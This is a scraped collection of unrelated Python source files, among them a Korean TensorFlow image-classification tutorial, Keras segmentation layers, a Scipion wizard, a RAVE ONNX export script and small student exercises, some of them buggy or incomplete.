구성됩니다.\n# tf.keras.layers.Dense와 같은 층들의 가중치(parameter)는 훈련하는 동안 학습됩니다.\n\nmodel = tf.keras.Sequential([\n tf.keras.layers.Flatten(input_shape=(28, 28)),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(10)\n])\n\n# 이 네트워크의 첫 번째 층인 tf.keras.layers.Flatten은 2차원 배열(28 x 28 픽셀)의\n# 이미지 포맷을 28 * 28 = 784 픽셀의 1차원 배열로 변환합니다.\n# 이 층은 이미지에 있는 픽셀의 행을 펼쳐서 일렬로 늘립니다.\n# 이 층에는 학습되는 가중치가 없고 데이터를 변환하기만 합니다.\n\n# 픽셀을 펼친 후에는 두 개의 tf.keras.layers.Dense 층이 연속되어 연결됩니다.\n# 이 층을 밀집 연결(densely-connected) 또는 완전 연결(fully-connected) 층이라고 부릅니다.\n# 첫 번째 Dense 층은 128개의 노드(또는 뉴런)를 가집니다.\n# 두 번째 (마지막) 층은 10개의 노드의 소프트맥스(softmax) 층입니다.\n# 이 층은 10개의 확률을 반환하고 반환된 값의 전체 합은 1입니다.\n# 각 노드는 현재 이미지가 10개 클래스 중 하나에 속할 확률을 출력합니다.\n\n# 모델 컴파일\n# 모델을 훈련할 준비가 되기 전에 몇 가지 설정이 더 필요합니다.\n# 다음은 모델의 컴파일 단계에서 추가됩니다.\n\n# - 손실 함수(Loss function) - 훈련 중 모델이 얼마나 정확한지 측정합니다.(MSE)\n# 모델을 올바른 방향으로 \"조정\"하려면 이 함수를 최소화해야 합니다.\n# - 옵티마이저(Optimizer) - 모델이 인식하는 데이터와 해당 손실 함수를 기반으로\n# 모델이 업데이트되는 방식입니다.\n# - 메트릭(Metrics) — 훈련 및 테스트 단계를 모니터링하는 데 사용됩니다.\n# 다음 예에서는 올바르게 분류된 이미지의 비율인 정확도를 사용합니다.\n\nmodel.compile(optimizer='adam',\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\n# 모델 훈련\n# 신경망 모델을 훈련하려면 다음 단계가 필요합니다.\n# 1. 훈련 데이터를 모델에 주입합니다-이 예에서는 train_images와 train_labels 배열입니다.\n# 2. 모델이 이미지와 레이블을 매핑하는 방법을 배웁니다.\n# 3. 테스트 세트에 대한 모델의 예측을 만듭니다-이 예에서는 test_images 배열입니다.\n# 이 예측이 test_labels 배열의 레이블과 맞는지 확인합니다.\n# 4. 예측이 test_labels 배열의 레이블과 일치하는지 확인합니다.\n\n# 모델 피드\n# 훈련을 시작하려면 model.fit 메서드를 호출합니다.\n# 모델을 훈련 데이터에 \"맞추기(fit)\" 때문에 이렇게 불립니다.\n\nmodel.fit(train_images, train_labels, epochs=10)\n\n# Epoch 1/10\n# 1875/1875 [==============================] - 4s 1ms/step - loss: 0.4997 - accuracy: 0.8245\n# Epoch 2/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.3711 - accuracy: 0.8664\n# Epoch 3/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.3360 - accuracy: 0.8767\n# Epoch 4/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.3120 - accuracy: 0.8850\n# Epoch 5/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.2943 - accuracy: 0.8912\n# Epoch 6/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.2806 - accuracy: 0.8963\n# Epoch 7/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.2676 - accuracy: 0.8994\n# Epoch 8/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.2573 - accuracy: 0.9037\n# Epoch 9/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.2469 - accuracy: 0.9080\n# Epoch 10/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.2374 - accuracy: 0.9107\n# \n\n# 모델이 훈련되면서 손실과 정확도 지표가 출력됩니다.\n# 이 모델은 훈련 세트에서 약 0.88(88%) 정도의 정확도를 달성합니다.\n\n# 정확도 평가\n# 다음으로, 모델이 테스트 데이터세트에서 작동하는 방식을 비교합니다.\n\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\nprint('\\nTest accuracy:', test_acc)\n\n# 313/313 - 0s - loss: 0.3316 - accuracy: 0.8832 - 388ms/epoch - 1ms/step\n# Test accuracy: 0.8831999897956848\n\n# 테스트 세트의 정확도가 훈련 세트의 정확도보다 조금 낮습니다.\n# 훈련 세트의 정확도와 테스트 세트의 정확도 사이의 차이는 과대적합(overfitting) 때문입니다.\n# 과대적합은 머신러닝 모델이 훈련 데이터보다 새로운 데이터에서 성능이 낮아지는 현상을 말합니다.\n# - 과대적합 시연\n# - 과대적합을 방지하기 위한 전략\n\n# 예측하기\n# 훈련된 모델을 사용하여 일부 이미지에 대한 예측을 수행할 수 있습니다.\n# 모델의 선형 출력, 로짓. 소프트맥스 레이어를 연결하여 로짓을 해석하기 쉬운 확률로 변환합니다.\n\nprobability_model = tf.keras.Sequential([model, \n tf.keras.layers.Softmax()])\npredictions = probability_model.predict(test_images)\n\n# 여기서는 테스트 세트에 있는 각 이미지의 레이블을 예측했습니다. 첫 번째 예측을 확인해 보죠:\npredictions[0]\n# array([4.5523601e-07, 2.5354547e-07, 4.1117669e-08, 5.4440511e-11,\n# 3.3533016e-09, 1.0785974e-03, 1.3920819e-06, 7.1124728e-03,\n# 1.5985714e-05, 9.9179077e-01], dtype=float32)\n\n# 이 예측은 10개의 숫자 배열로 나타납니다.\n# 이 값은 10개의 옷 품목에 상응하는 모델의 신뢰도(confidence)를 나타냅니다.\n# 가장 높은 신뢰도를 가진 레이블을 찾아보죠:\nnp.argmax(predictions[0])\n# 9\n\n# 모델은 이 이미지가 앵클 부츠(class_name[9])라고 가장 확신하고 있습니다.\n# 이 값이 맞는지 테스트 레이블을 확인해 보죠:\ntest_labels[0]\n# 9\n\n# 10개 클래스에 대한 예측을 모두 그래프로 표현해 보겠습니다:\ndef plot_image(i, predictions_array, true_label, img):\n true_label, img = true_label[i], img[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n\n plt.imshow(img, cmap=plt.cm.binary)\n\n predicted_label = np.argmax(predictions_array)\n if predicted_label == true_label:\n color = 'blue'\n else:\n color = 'red'\n\n plt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label],\n 100*np.max(predictions_array),\n class_names[true_label]),\n color=color)\n\ndef plot_value_array(i, predictions_array, true_label):\n true_label = true_label[i]\n plt.grid(False)\n plt.xticks(range(10))\n plt.yticks([])\n thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n plt.ylim([0, 1])\n predicted_label = np.argmax(predictions_array)\n\n thisplot[predicted_label].set_color('red')\n thisplot[true_label].set_color('blue')\n\n# 예측 확인\n# 훈련된 모델을 사용하여 일부 이미지에 대한 예측을 수행할 수 있습니다.\n\n# 0번째 원소의 이미지, 예측, 신뢰도 점수 배열을 확인해 보겠습니다.\ni = 0\nplt.figure(figsize=(6,3))\nplt.subplot(1,2,1)\nplot_image(i, predictions[i], test_labels, test_images)\nplt.subplot(1,2,2)\nplot_value_array(i, predictions[i], test_labels)\nplt.show()\n\ni = 12\nplt.figure(figsize=(6,3))\nplt.subplot(1,2,1)\nplot_image(i, predictions[i], test_labels, test_images)\nplt.subplot(1,2,2)\nplot_value_array(i, predictions[i], test_labels)\nplt.show()\n\n# 몇 개의 이미지의 예측을 출력해 보죠.\n# 올바르게 예측된 레이블은 파란색이고 잘못 예측된 레이블은 빨강색입니다.\n# 숫자는 예측 레이블의 신뢰도 퍼센트(100점 만점)입니다.\n# 신뢰도 점수가 높을 때도 잘못 예측할 수 있습니다.\n\n# Plot the first X test images, their predicted labels, and the true labels.\n# Color correct predictions in blue and incorrect predictions in red.\nnum_rows = 5\nnum_cols = 3\nnum_images = num_rows*num_cols\nplt.figure(figsize=(2*2*num_cols, 2*num_rows))\nfor i in range(num_images):\n plt.subplot(num_rows, 2*num_cols, 2*i+1)\n plot_image(i, predictions[i], test_labels, test_images)\n plt.subplot(num_rows, 2*num_cols, 2*i+2)\n plot_value_array(i, predictions[i], test_labels)\nplt.tight_layout()\nplt.show()\n\n# 훈련된 모델 사용하기\n# 마지막으로 훈련된 모델을 사용하여 한 이미지에 대한 예측을 만듭니다.\n\n# Grab an image from the test dataset.\nimg = test_images[1]\nprint(img.shape)\n# (28, 28)\n\n# tf.keras 모델은 한 번에 샘플의 묶음 또는 배치(batch)로 예측을 만드는데 최적화되어 있습니다.\n# 하나의 이미지를 사용할 때에도 2차원 배열로 만들어야 합니다:\n\n# Add the image to a batch where it's the only member.\nimg = (np.expand_dims(img,0))\nprint(img.shape)\n\n# 이제 이 이미지의 예측을 만듭니다:\npredictions_single = probability_model.predict(img)\nprint(predictions_single)\n# [[1.3309498e-05 5.3667986e-12 9.9919826e-01 7.4546870e-12 5.3125247e-04\n# 9.5022568e-10 2.5713479e-04 8.0847931e-13 2.6048724e-10 2.2007651e-13]]\n\nplot_value_array(1, predictions_single[0], test_labels)\n_ = plt.xticks(range(10), class_names, rotation=45)\nplt.show()\n\n# tf.keras.Model.predict는 데이터 배치의 각 이미지에 대해 하나의 목록씩 목록의 목록을 반환합니다.\n# 배치에서 (유일한) 이미지에 대한 예측을 가져옵니다.\nnp.argmax(predictions_single[0])\n# 2\n\n# 예상과 같이 모델이 레이블을 예측합니다.\n\n# MIT License\n#\n# Copyright (c) 2017 François Chollet\n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\n\n","repo_name":"astroeye/autoencoder","sub_path":"01_study/Tensorflow/121_Basic_image_lassification.py","file_name":"121_Basic_image_lassification.py","file_ext":"py","file_size_in_byte":16185,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"21105999915","text":"# **************************************************************************\n# *\n# * Authors: David Herreros Calero (dherreros@cnb.csic.es)\n# *\n# * Unidad de Bioinformatica of Centro Nacional de Biotecnologia , CSIC\n# *\n# * This program is free software; you can redistribute it and/or modify\n# * it under the terms of the GNU General Public License as published by\n# * the Free Software Foundation; either version 2 of the License, or\n# * (at your option) any later version.\n# *\n# * This program is distributed in the hope that it will be useful,\n# * but WITHOUT ANY WARRANTY; without even the implied warranty of\n# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# * GNU General Public License for more details.\n# *\n# * You should have received a copy of the GNU General Public License\n# * along with this program; if not, write to the Free Software\n# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n# * 02111-1307 USA\n# *\n# * All comments concerning this program package may be sent to the\n# * e-mail address 'scipion@cnb.csic.es'\n# *\n# **************************************************************************\nfrom dynamo.protocols.protocol_extraction import OTHER\nfrom pwem.wizards import EmWizard\nfrom dynamo.protocols import DynamoExtraction, DynamoModelWorkflow\n\n\n# =============================================================================\n# EXTRACTION\n# =============================================================================\n\n\nclass DynamoExtractionWizard(EmWizard):\n _targets = [(DynamoExtraction, ['boxSize'])]\n\n def show(self, form):\n binFactor = 1\n DynamoExtractProt = form.protocol\n inputCoordinates = DynamoExtractProt.inputCoordinates.get()\n tomoSource = DynamoExtractProt.tomoSource.get()\n if not inputCoordinates:\n print('You must specify input coordinates')\n return\n\n boxSize = inputCoordinates.getBoxSize()\n if not boxSize:\n print('These coordinates do not have box size. Please, enter box size manually.')\n return\n\n if tomoSource == OTHER:\n inTomos = DynamoExtractProt.inputTomograms.get()\n if not inTomos:\n print('The tomograms for the subtomogram extraction must be specified if the selected '\n 'tomogram source is \"Other\"')\n return\n coordsSRate = inputCoordinates.getSamplingRate()\n tomosSRate = inTomos.getSamplingRate()\n binFactor = coordsSRate / tomosSRate\n\n boxSize = round(boxSize * binFactor)\n form.setVar('boxSize', boxSize)\n\n\n# =============================================================================\n# MODEL WORKFLOW\n# =============================================================================\n\nclass DynamoModelWorkflowWizard(EmWizard):\n _targets = [(DynamoModelWorkflow, ['boxSize'])]\n\n def show(self, form):\n DynamoModelWorkflowProt = form.protocol\n inputMeshes = DynamoModelWorkflowProt.inputMeshes.get()\n if not inputMeshes:\n print('You must specify input meshes')\n return\n\n aux = inputMeshes.getBoxSize()\n if not aux % 2 == 0:\n aux += 1\n boxSize = aux\n if not boxSize:\n print('These coordinates do not have box size. Please, enter box size manually.')\n return\n\n form.setVar('boxSize', boxSize)","repo_name":"scipion-em/scipion-em-dynamo","sub_path":"dynamo/wizards.py","file_name":"wizards.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"21895294330","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndf = pd.read_csv('Salary_Data.csv')\r\nX = df.iloc[:,0]\r\ny = df.iloc[:,1]\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size=1/3.0, random_state=0)\r\nX_train = X_train.values.reshape(-1,1)\r\n\r\nfrom sklearn import linear_model\r\nregressor = linear_model.LinearRegression()\r\nregressor.fit(X_train, y_train)\r\n\r\n#fig = plt.figure(figsize=12,8)\r\nplt.scatter(X_train, y_train)\r\nplt.plot(np.arrange(0,12,0.3))\r\nregressor.predict(np.arrange(0,12,0.3).reshape(-1,1), color='red')\r\nplt.title('Salary vs Experience')\r\nplt.xlabel('Years of Esperience')\r\nplt.ylabel('Salary')\r\nplt.show()","repo_name":"Snakesystem/Notebook","sub_path":"educba/1_Normal_Linear_Regretion.py","file_name":"1_Normal_Linear_Regretion.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"10799880992","text":"from keras.layers import *\nimport keras.backend as K\nimport tensorflow as tf\nfrom keras_applications.mobilenet import relu6\nclass BilinearUpsampling(Layer):\n def __init__(self, upsampling=(2, 2), data_format=None, **kwargs):\n super(BilinearUpsampling, self).__init__(**kwargs)\n self.data_format = conv_utils.normalize_data_format(data_format)\n self.upsampling = conv_utils.normalize_tuple(upsampling, 2, 'size')\n self.input_spec = InputSpec(ndim=4)\n def compute_output_shape(self, input_shape):\n height = self.upsampling[0] * \\\n input_shape[1] if input_shape[1] is not None else None\n width = self.upsampling[1] * \\\n input_shape[2] if input_shape[2] is not None else None\n return (input_shape[0],\n height,\n width,\n input_shape[3])\n def call(self, inputs):\n return K.tf.image.resize_bilinear(inputs, (int(inputs.shape[1]*self.upsampling[0]),\n int(inputs.shape[2]*self.upsampling[1])))\n def get_config(self):\n config = {'size': self.upsampling,\n 'data_format': self.data_format}\n base_config = super(BilinearUpsampling, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\ndef aspp(x,input_shape,out_stride):\n b0=Conv2D(128,(1,1),kernel_initializer='he_normal',padding=\"same\",use_bias=True)(x)\n b0=BatchNormalization()(b0)\n b0=Activation(\"relu\")(b0)\n\n b1=Conv2D(128,(3,3),kernel_initializer='he_normal',dilation_rate=(6,6),padding=\"same\",use_bias=True)(x)\n b1=BatchNormalization()(b1)\n b1=Activation(\"relu\")(b1)\n\n b2=Conv2D(128,(3,3),kernel_initializer='he_normal',dilation_rate=(12,12),padding=\"same\",use_bias=True)(x)\n b2=BatchNormalization()(b2)\n b2=Activation(\"relu\")(b2)\n\n b3=Conv2D(128,(3,3),kernel_initializer='he_normal',dilation_rate=(18,18),padding=\"same\",use_bias=True)(x)\n b3=BatchNormalization()(b3)\n b3=Activation(\"relu\")(b3)\n\n out_shape=int(input_shape[0]/out_stride)\n b4=MaxPooling2D(pool_size=(out_shape,out_shape))(x)\n b4=Conv2D(128,(1,1),kernel_initializer='he_normal',padding=\"same\",use_bias=True)(b4)\n b4=BatchNormalization()(b4)\n b4=Activation(\"relu\")(b4)\n b4=BilinearUpsampling((out_shape,out_shape))(b4)\n\n x=Concatenate()([b4,b0,b1,b2,b3])\n return x\n\ndef aspp_plus(x,input_shape,out_stride):\n b0=Conv2D(256,(1,1),padding=\"same\",use_bias=True)(x)\n b0=BatchNormalization()(b0)\n b0=Activation(relu6)(b0)\n\n b1=DepthwiseConv2D((3,3),dilation_rate=(6,6),padding=\"same\",use_bias=True)(x)\n b1=BatchNormalization()(b1)\n b1=Activation(relu6)(b1)\n b1=Conv2D(256,(1,1),padding=\"same\",use_bias=False)(b1)\n b1=BatchNormalization()(b1)\n b1=Activation(relu6)(b1)\n\n b2=DepthwiseConv2D((3,3),dilation_rate=(12,12),padding=\"same\",use_bias=True)(x)\n b2=BatchNormalization()(b2)\n b2=Activation(relu6)(b2)\n b2=Conv2D(256,(1,1),padding=\"same\",use_bias=True)(b2)\n b2=BatchNormalization()(b2)\n b2=Activation(relu6)(b2)\n\n b3=DepthwiseConv2D((3,3),dilation_rate=(18,18),padding=\"same\",use_bias=True)(x)\n b3=BatchNormalization()(b3)\n b3=Activation(relu6)(b3)\n b3=Conv2D(256,(1,1),padding=\"same\",use_bias=True)(b3)\n b3=BatchNormalization()(b3)\n b3=Activation(relu6)(b3)\n\n out_shape=int(input_shape[0]/out_stride)\n b4=AveragePooling2D(pool_size=(out_shape,out_shape))(x)\n b4=Conv2D(256,(1,1),padding=\"same\",use_bias=True)(b4)\n b4=BatchNormalization()(b4)\n b4=Activation(relu6)(b4)\n b4=BilinearUpsampling((out_shape,out_shape))(b4)\n\n x=Concatenate()([b4,b0,b1,b2,b3])\n return x\n\ndef _make_divisible(v,divisor,min_value=None):\n if min_value is None :\n min_value =divisor\n new_v = max(min_value,int(v+divisor/2)// divisor*divisor)\n if new_v < 0.9*v :\n new_v += divisor\n return new_v\n\ndef _conv_block(inputs, filters, kernel, strides):\n channel_axis = 1 if K.image_data_format() == 'channels_first' else -1\n x = Conv2D(filters,kernel,padding=\"same\",strides=strides)(inputs)\n return Activation(relu6)(x)\n\ndef _bottleneck(inputs,filters,kernel,t,alpha,s,r=False):\n channel_axis = 1 if K.image_data_format() =='channels_first' else -1\n tchannel = K.int_shape(inputs)[channel_axis]*t\n cchannel = int(filters * alpha)\n x = _conv_block(inputs,tchannel,(1,1),(1,1))\n x = DepthwiseConv2D(kernel,strides=(s,s),depth_multiplier=1,padding='same')(x)\n x = BatchNormalization(axis=channel_axis)(x)\n x = Activation(relu6)(x)\n x = Conv2D(cchannel, (1,1), strides=(1,1), padding='same')(x)\n x = BatchNormalization(axis=channel_axis)(x)\n if r :\n x = add([x,inputs])\n return x\n\ndef _inverted_residual_block(inputs,filters,kernel,t,alpha,strides,n):\n x = _bottleneck(inputs,filters,kernel,t,alpha,strides)\n for i in range(1,n):\n x = _bottleneck(x,filters,kernel,t,alpha,1,True)\n return x","repo_name":"grant111924/Simplified_Network","sub_path":"model/keras_fun.py","file_name":"keras_fun.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"11429271366","text":"import threading\nimport time\n\nfrom lps.commands import Commands\nfrom lps.constants import Modes\nfrom lps.debugger import Debugger, INFO\n\n\nclass VictimDirectionTest:\n def __init__(self, tinbot, debugger=None):\n self.debugger = debugger or Debugger.current\n\n self.tinbot = tinbot\n\n self.thread = None\n self.iterations = None\n self.result = None\n self.done = threading.Event()\n\n def start(self, iterations=50):\n self.iterations = iterations\n self.result = []\n\n self.thread = threading.Thread(target=self.run)\n self.thread.start()\n\n def run(self):\n self.tinbot.package_event += self.on_package\n self.debugger.print_message('Starting Victim Direction Test', INFO)\n self.tinbot.set_mode(Modes.VICDIR)\n for iteration in range(self.iterations):\n time.sleep(0.5)\n self.done.clear()\n self.tinbot.start()\n self.done.wait()\n self.tinbot.reset()\n self.tinbot.package_event -= self.on_package\n\n def on_package(self, device, source, target, command, payload):\n if command != Commands.VICTIM_PHI:\n return\n x, y, phi = Commands.VICTIM_PHI.decode(payload)\n self.result.append((phi, self.tinbot.victim_phi))\n self.done.set()\n","repo_name":"Schwenger/TinBots","sub_path":"implementation/lps/lps/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"9736570206","text":"import torch\n\ntorch.set_grad_enabled(False)\nimport os\n\nimport cached_conv as cc\nimport gin\nimport torch.nn as nn\nfrom absl import app, flags\nfrom effortless_config import Config\n\nimport rave\n\nflags.DEFINE_string('run', default=None, required=True, help='Run to export')\nFLAGS = flags.FLAGS\n\n\ndef main(argv):\n gin.parse_config_file(os.path.join(FLAGS.run, \"config.gin\"))\n checkpoint = rave.core.search_for_run(FLAGS.run)\n\n print(f\"using {checkpoint}\")\n\n pretrained = rave.RAVE()\n pretrained.load_state_dict(torch.load(checkpoint)[\"state_dict\"])\n pretrained.eval()\n\n for m in pretrained.modules():\n if hasattr(m, \"weight_g\"):\n nn.utils.remove_weight_norm(m)\n\n def recursive_replace(model: nn.Module):\n for name, child in model.named_children():\n if isinstance(child, cc.convs.Conv1d):\n conv = nn.Conv1d(\n child.in_channels,\n child.out_channels,\n child.kernel_size,\n child.stride,\n child._pad[0],\n child.dilation,\n child.groups,\n child.bias,\n )\n conv.weight.data.copy_(child.weight.data)\n if conv.bias is not None:\n conv.bias.data.copy_(child.bias.data)\n setattr(model, name, conv)\n elif isinstance(child, cc.convs.ConvTranspose1d):\n conv = nn.ConvTranspose1d(\n child.in_channels,\n child.out_channels,\n child.kernel_size,\n child.stride,\n child.padding,\n child.output_padding,\n child.groups,\n child.bias,\n child.dilation,\n child.padding_mode,\n )\n conv.weight.data.copy_(child.weight.data)\n if conv.bias is not None:\n conv.bias.data.copy_(child.bias.data)\n setattr(model, name, conv)\n else:\n recursive_replace(child)\n\n recursive_replace(pretrained)\n\n x = torch.randn(1, 1, 2**15)\n pretrained(x)\n\n name = os.path.basename(os.path.normpath(FLAGS.run))\n export_path = os.path.join(FLAGS.run, name)\n torch.onnx.export(\n pretrained,\n x,\n f\"{export_path}.onnx\",\n export_params=True,\n opset_version=12,\n input_names=[\"audio_in\"],\n output_names=[\"audio_out\"],\n dynamic_axes={\n \"audio_in\": {\n 2: \"audio_length\"\n },\n \"audio_out\": [0],\n },\n do_constant_folding=False,\n )\n\n\nif __name__ == '__main__':\n app.run(main)","repo_name":"acids-ircam/RAVE","sub_path":"scripts/export_onnx.py","file_name":"export_onnx.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":1043,"dataset":"github-code","pt":"8"} +{"seq_id":"40549218079","text":"from PIL import Image as im \r\nimport glob\r\nimport os\r\n\r\n\r\ndef create_gif(folder):\r\n frame = []\r\n new_folder = folder + \"/*.png\"\r\n img = glob.glob(new_folder)\r\n\r\n for i in img:\r\n cur_img = im.open(i)\r\n frame.append(cur_img)\r\n \r\n path = folder + \".gif\"\r\n frame[0].save(path , format = \"GIF\" , append_images=frame[1:], save_all=True, duration=100, loop=0)\r\n\r\n\r\ncwd = os.getcwd()\r\nfolder = os.listdir(cwd)\r\n\r\nfor x in folder:\r\n if os.path.isdir(x):\r\n create_gif(x)","repo_name":"mandalsudipti/Image-To-GIF","sub_path":"gif_maker.py","file_name":"gif_maker.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"4023117638","text":"from tkinter import * # from x import * is bad practice\nfrom ServerGui.StatusCircle import StatusCircle\nfrom PIL import Image, ImageTk\n\n\nclass SmartroomListElement(LabelFrame):\n sc = \"\"\n smartroom = \"\"\n set_icon = \"\"\n set_img = Image.open(\"ServerGui/setting.png\")\n set_img = set_img.resize((20, 20))\n\n def __init__(self, parent, origin, key, *args, **kw):\n super().__init__(master = parent, *args, **kw)\n self.parent = parent\n self.origin = origin\n self.smartroom = key\n\n self.set_icon = ImageTk.PhotoImage(self.set_img)\n\n smart_frame = Frame(self, bg = self[\"bg\"])\n smart_frame.grid(row = 0, column = 0, padx = 5, pady = 5, sticky = W)\n\n conn_frame = Frame(self, bg = self[\"bg\"])\n conn_frame.grid(row = 0, column = 1, padx = 5, pady = 5)\n label2 = Label(conn_frame, text=\"Connection status: \", bg = self[\"bg\"])\n label2.pack(padx = 10, pady = 5, side = LEFT)\n self.sc = StatusCircle(conn_frame, height = 30, width = 30, bg = self[\"bg\"])\n self.sc.pack(padx = 5, pady = 5)\n\n self.grid_columnconfigure(2, weight=1)\n settingButton = Button(self, image = self.set_icon, command = self.showSmartRoom, bg = self[\"bg\"])\n settingButton.grid(row = 0, column = 2, padx = 5, pady = 5, sticky = E)\n\n def changeStatus(self):\n self.sc.change();\n\n def showSmartRoom(self):\n self.origin.window.server.retriveSensorList(self.smartroom)\n self.origin.roomCard(self.smartroom)\n","repo_name":"SmartRoomCorporation/SmartRoom","sub_path":"server/src/main/ServerGui/SmartroomListElement.py","file_name":"SmartroomListElement.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"17778405741","text":"#!/usr/bin/env python\n\nimport base_filters\n\nCOPY_GOOGLE_DOC_KEY = '1hrAN4ABVe0_Qkz9CSOp8SmOYZg76bCc1UxjE0RafPFM'\n\nUSE_ASSETS = False\n\n# Use these variables to override the default cache timeouts for this graphic\n# DEFAULT_MAX_AGE = 20\n# ASSETS_MAX_AGE = 300\n\nJINJA_FILTER_FUNCTIONS = base_filters.FILTERS\n","repo_name":"nprapps/graphics-archive","sub_path":"2016/11/homeless-20161117/graphic_config.py","file_name":"graphic_config.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"8"} +{"seq_id":"10842717038","text":"import unittest\r\nclass Solution(object):\r\n '''\r\n In some array arr, the values were in arithmetic progression: the values arr[i+1] - arr[i] are all equal for every 0 <= i < arr.length - 1.\r\n\r\n Then, a value from arr was removed that was not the first or last value in the array.\r\n\r\n Return the removed value.\r\n\r\n \r\n\r\n Example 1:\r\n\r\n Input: arr = [5,7,11,13]\r\n Output: 9\r\n Explanation: The previous array was [5,7,9,11,13].\r\n Example 2:\r\n\r\n Input: arr = [15,13,12]\r\n Output: 14\r\n Explanation: The previous array was [15,14,13,12].\r\n '''\r\n def missingNumber(self, arr):\r\n \"\"\"\r\n :type arr: List[int]\r\n :rtype: int\r\n \"\"\"\r\n d = (arr[-1] - arr[0])/len(arr)\r\n \r\n for i in range(1,len(arr)):\r\n if d != arr[i] - arr[i-1]:\r\n return arr[i-1] + d\r\n return 0\r\n \r\nclass Test(unittest.TestCase):\r\n def test_missingNumber(self):\r\n data = [5,7,11,13]\r\n expected = 9\r\n sol = Solution()\r\n self.assertEqual(sol.missingNumber(data),expected)\r\n \r\n \r\n\r\nif __name__ == \"__main__\":\r\n print(Solution.__doc__)\r\n unittest.main()","repo_name":"adheepshetty/leetcode-problems","sub_path":"Math/Missing Number In Arithmetic Progression.py","file_name":"Missing Number In Arithmetic Progression.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"10665951679","text":"'''Find a duplicate, Space Edition™.\n\nWe have a list of integers, where:\n\nThe integers are in the range 1..n1..n\nThe list has a length of n+1n+1\nIt follows that our list has at least one integer which appears at least twice. \nBut it may have several duplicates, and each duplicate may appear more than twice.\n\nWrite a function which finds an integer that appears more than once in our list.\n (If there are multiple duplicates, you only need to find one of them.)\n\nWe're going to run this function on our new, super-hip MacBook Pro With Retina\n Display™. Thing is, the damn thing came with the RAM soldered right to the \n motherboard, so we can't upgrade our RAM. So we need to optimize for space!\n\n>>> find_duplicate([1, 2, 1, 3, 4, 6, 5])\n1\n>>> find_duplicate([1,1])\n1\n\n '''\n\ndef find_duplicate(lst):\n\n floor = 1\n ceiling = len(lst) - 1\n\n while floor < ceiling:\n mid = floor + (ceiling - floor) // 2\n # found to ranges of numbers floor... mid, mid+1 ... ceiling\n\n\n numbers_in_lower_range = 0\n lower_floor = floor\n lower_ceiling = mid\n\n for item in lst:\n if item >= lower_floor and item <= lower_ceiling:\n numbers_in_lower_range += 1\n\n lower_range_len = lower_ceiling - lower_floor + 1\n\n if numbers_in_lower_range > lower_range_len:\n ceiling = lower_ceiling\n else:\n floor = lower_floor\n\n return ceiling\n\n\n\n\n\n\n\n\n\n\n\nif __name__ =='__main__':\n import doctest\n\n if doctest.testmod().failed == 0:\n 